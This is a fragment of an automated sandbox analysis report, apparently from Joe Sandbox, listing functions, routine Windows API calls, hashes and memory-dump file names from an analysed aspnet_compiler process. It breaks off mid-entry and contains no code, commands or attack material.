                                                          • Source File: 0000000D.00000002.541811360.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: 665f723a5e82ca476e461ccdd2d259e5560fa7235934546a3ffd52d987c7a3c7
                                                          • Instruction ID: d90ea754d99db2d9abd4fcdc73495245e7fae96ad713b828660b781994584198
                                                          • Opcode Fuzzy Hash: 665f723a5e82ca476e461ccdd2d259e5560fa7235934546a3ffd52d987c7a3c7
                                                          • Instruction Fuzzy Hash: CDE04F712403147BC610AA5AEC41F9B776CDBC5714F004069FA0C67181C7B5BA1487F4
                                                          Function 007C07AC Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 48 7c07ac-7c07c1 LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                          • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                          • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                          • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                          Function 007BF9F0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 44 7bf9f0-7bfa05 LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                          • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                          • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                          • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                          Function 007BFAE8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 45 7bfae8-7bfafd LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                          • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                          • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                          • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                          Function 007BFB68 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 46 7bfb68-7bfb7d LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                          • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                          • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                          • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                          Function 007BFDC0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 47 7bfdc0-7bfdd5 LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                          • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                          • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                          • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                          Function 0042C0E3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 29 42c0e3-42c121 call 404593 call 42cf73 RtlFreeHeap
                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,55CCCCC3,00000007,00000000,00000004,00000000,004168EC,000000F4), ref: 0042C11C
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541811360.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: d04050c8db7351cb7c42311d341b67d43b6c02a65ccfbd1526b30e449c1422bb
                                                          • Instruction ID: d601fce2e6cfc47c523398d08e96a68e9c79fc9ca5f02ac62e6cc3558dbc2de4
                                                          • Opcode Fuzzy Hash: d04050c8db7351cb7c42311d341b67d43b6c02a65ccfbd1526b30e449c1422bb
                                                          • Instruction Fuzzy Hash: D4E0EDB2244214BBD614EF99DC41F9B77ADDFC9714F004459FA08A7281D674BD14CAB8
                                                          Function 0042C0A3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 24 42c0a3-42c0e1 call 404593 call 42cf73 RtlAllocateHeap
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(?,0041DE11,?,?,00000000,?,0041DE11,?,?,?), ref: 0042C0DC
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541811360.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: 53b584e200e5f2eb778bd4060701bbb0a480973bbaf0056c1c6602fc846fd21c
                                                          • Instruction ID: e057fd75638c54c2a83d139f9191c8a4f81c752b1f28dea9c101fe2514506ad0
                                                          • Opcode Fuzzy Hash: 53b584e200e5f2eb778bd4060701bbb0a480973bbaf0056c1c6602fc846fd21c
                                                          • Instruction Fuzzy Hash: 68E06DB1204204BBDA14EE99EC41FAB37ACEFC9714F104019FA08A7281C674BD1487F8
                                                          Function 0042C123 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 39 42c123-42c15c call 404593 call 42cf73 ExitProcess
                                                          APIs
                                                          • ExitProcess.KERNELBASE(?), ref: 0042C157
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541811360.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExitProcess
                                                          • String ID:
                                                          • API String ID: 621844428-0
                                                          • Opcode ID: 29205141e20994605a55deee26b2df85bd7a3aaca56f5563100d8efa15c00275
                                                          • Instruction ID: 5b3de0624fe0a28c818fb70999a8e3532c71153bdfbe5aac28f931c41c5855af
                                                          • Opcode Fuzzy Hash: 29205141e20994605a55deee26b2df85bd7a3aaca56f5563100d8efa15c00275
                                                          • Instruction Fuzzy Hash: 10E086352402147BC610EB5ADC41F9B776CDFC5714F108419FA0CA7181C671BA1487F4

                                                          Non-executed Functions

                                                          Function 007D26F8 Relevance: .0, Instructions: 44COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                          • Instruction ID: b5ea3ef518d536c071240a25b47ffc4e6ef36068491f3ce42ab07738b3719ab2
                                                          • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                          • Instruction Fuzzy Hash: E5F02820318049EBC769EA188C5176A33E5EF64311F54C03AEE49C7303D539DD438260
                                                          Function 00810101 Relevance: .0, Instructions: 31COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                          • Instruction ID: 94b8466814b3df220510d4f86a2b5e7e00e5c7b3947c03b8e73f081d65439308
                                                          • Opcode Fuzzy Hash: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                          • Instruction Fuzzy Hash: E6F0DA72240208EBCB588F04C890BA977AAFF94719F24446CE50ACF691D77999C1DA55
                                                          Function 007C0078 Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                          • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                          • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                          • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                          Function 007C0060 Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                          • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                                          • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                          • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                                          Function 007C0048 Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                          • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                          • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                          • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                          Function 007C10D0 Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                          • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                                          • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                          • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                                          Function 007C00C4 Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                          • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                          • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                          • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                          Function 007C1148 Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                          • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                                          • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                          • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                                          Function 007C010C Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                          • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                                          • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                          • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                                          Function 007C01D4 Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
